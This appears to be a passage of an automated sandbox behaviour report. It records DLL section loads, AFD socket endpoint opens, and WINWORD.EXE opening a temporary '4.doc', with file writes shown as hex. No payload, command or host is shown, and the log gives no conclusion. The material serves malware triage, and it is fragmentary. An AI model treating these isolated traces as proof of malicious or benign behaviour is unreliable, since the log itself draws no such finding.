    Section loaded Path: C:\WINDOWS\system32\rtutils.dll Access: query and write and read and execute Type: image Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 476477882
    Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid object name not found 476480812
    Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 476481450
    Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: B20000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 476506928
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 476529936
    File opened Path: c:\autoexec.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 476578577
    File opened Path: c:\autoexec.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 476610646
    Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 476624289
    Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 476626636
    Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 476641825
    Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 476722022
    Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 476726698
    Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 476754340
    Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 476755323
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476877189
    Section loaded Path: \BaseNamedObjects\Local\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name exists 476913785
    Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 477019632
    Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 477024545
    Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: B80000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 477123155
    Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 477146740
    File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 477172999
    File opened Path: \Device\Afd\AsyncConnectHlp Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 477227052
    Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 478343743
    Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 478345896
    Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 478351786
    Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 478353958
    Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 478377720
    Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 478379476
    Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid object name not found 478387500
    Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 478389269
    Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 478394023
    Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 478395844
    Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 478422273
    Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 478424306
    Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 478473817
    Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 478475846
    Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 478484665
    Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 478486477
    Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: EA0000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 478559612
    Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 478565414
    Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 478570187
    Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 478575858
    File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true success or wait 483203236
    Analysis File: WINWORD.EXE PID: 296 Parent PID: 1888
    + Sections
    + General
    Start time: 04:13:17
    Start date: 13/12/2011
    Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
    Commandline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc
    Imagebase: 0x30000000
    File size: 12047560 bytes
    MD5 hash: 5FEAF6AB43AA477597F9F8DB0E8CB69C
    File Activities:
    + File deleted
    File Path Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 2 300D26C2
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300D26C2
    + File renamed
    Old File Path New File Path Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0000 unknown success or wait 1 300AC24B
    + File written
    File Path Offset Length Value Completion Count Source Address
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc none 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 300408C8
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc none 108 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 1 300408C8
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC none 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 2 300408C8
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC none 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 2 300408C8
    + Other file operations
    File Path Disposition Data Ascii Data Completion Count Source Address
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC PositionInformation Offset: 0 success or wait 6 301CCD6E
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    \KnownDlls\psapi.dll write and read and execute unknown 870000 57344 own pid read write object name not found 1
    C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8D0000 774144 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8D0000 774144 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read and execute and extend size unknown A20000 126976 own pid read write success or wait 1
    \KnownDlls\uxtheme.dll write and read and execute unknown A20000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    C:\WINDOWS\system32\msctf.dll write and read and execute commit A60000 299008 own pid execute success or wait 1
    C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
    \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
    \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A60000 262144 own pid read write success or wait 1
    \KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AB0000 1753088 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AB0000 1753088 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read and execute and extend size unknown C60000 126976 own pid read write success or wait 1
    \KnownDlls\msi.dll write and read and execute unknown C60000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit D00000 401408 own pid execute success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit D00000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit D00000 618496 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit DB0000 966656 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 962560 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E30000 159744 own pid execute success or wait 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown E30000 159744 own pid execute object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown E50000 4096 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL write and read and execute commit E50000 368640 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL query and write and read and execute image 10000000 372736 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve 10000000 372736 own pid read write object name exists 1
    \KnownDlls\SETUPAPI.dll write and read and execute unknown 10000000 372736 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap325F0 query and write and read reserve FE0000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-206324 query and write and read commit 13E0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\DfRoot0000325F0 query and write and read commit 1460000 4096 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-206340 query and write and read commit 1470000 524288 own pid read write success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 14F0000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1500000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 1560000 126976 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read and execute and extend size unknown 1560000 126976 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1580000 159744 own pid execute success or wait 1
    \BaseNamedObjects\Global\RotHintTable read unknown 1580000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1590000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown 1590000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1590000 2904064 own pid read write conflicting addresses 1
    \KnownDlls\SXS.DLL write and read and execute unknown 1590000 2904064 own pid read write object name not found 1
    C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 1A80000 126976 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1AA0000 159744 own pid execute success or wait 1
    \KnownDlls\LINKINFO.dll write and read and execute unknown 76380000 20480 own pid read write object name not found 1
    C:\WINDOWS\system32\linkinfo.dll query and write and read and execute image 76980000 32768 own pid read write success or wait 1
    \KnownDlls\ntshrui.dll write and read and execute unknown 76980000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\ntshrui.dll query and write and read and execute image 76990000 151552 own pid read write success or wait 1
    \KnownDlls\ATL.DLL write and read and execute unknown 76990000 151552 own pid read write object name not found 1
    C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76B20000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\ntshrui.dll read commit 1AB0000 143360 own pid readonly success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    unknown query and write and read commit 1AB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB..JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.AJH query and write and read and execute and extend size unknown 1AF0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.B.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.C.JOJAC query and write and read commit 1AD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.D.JOJAC query and write and read commit 1B70000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.E.JOJAC query and write and read commit 1B80000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.F.JOJAC query and write and read commit 1B90000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.G.JOJAC query and write and read commit 1BA0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.H.JOJAC query and write and read commit 1BB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.I.JOJAC query and write and read commit 1BC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.J.JOJAC query and write and read commit 1BD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.K.JOJAC query and write and read commit 1BE0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.L.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.M.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.N.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.O.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.P.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EB.JOJAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.O.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.P.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.CB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.DB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.EB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.FB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.GB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.HB.JOJAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FB.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GB.ELKAC query and write and read commit 1AD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HB.ELKAC query and write and read commit 1B70000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IB.ELKAC query and write and read commit 1B80000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.JB.ELKAC query and write and read commit 1B90000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.KB.ELKAC query and write and read commit 1BA0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.LB.ELKAC query and write and read commit 1BB0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.MB.ELKAC query and write and read commit 1BC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.NB.ELKAC query and write and read commit 1BD0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.OB.ELKAC query and write and read commit 1BE0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.PB.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.IB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.JB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.KB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.LB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.MB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.NB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.OB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.PB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AC.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BC.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL write and read and execute commit 1AC0000 126976 own pid execute success or wait 1
